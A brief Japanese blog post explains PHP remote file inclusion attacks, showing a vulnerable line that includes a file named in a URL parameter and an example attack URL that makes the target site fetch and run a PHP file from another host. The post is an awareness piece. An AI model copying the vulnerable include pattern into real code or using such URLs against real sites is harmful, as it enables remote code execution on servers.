作る効率や利便性の為だけに、犠牲にしている事はないですか?
Webサイトを構築する際のセキュリティって、ついつい後回しになりがちな
内容を考えてみたいと思います。
今回は、任意のファイルを読み込ませて実行させるインクルード攻撃について考察です。
<?php include $_GET['file']; ?>
攻撃方法:
http://xxx.php?file=http://abc/xxx.php
とすることで、サイトxxxにサイトabcのファイルを
読み込ませて実行することができます。
外部からのファイルの読み込みは、避けたいものですね~。
0 件のコメント:
コメントを投稿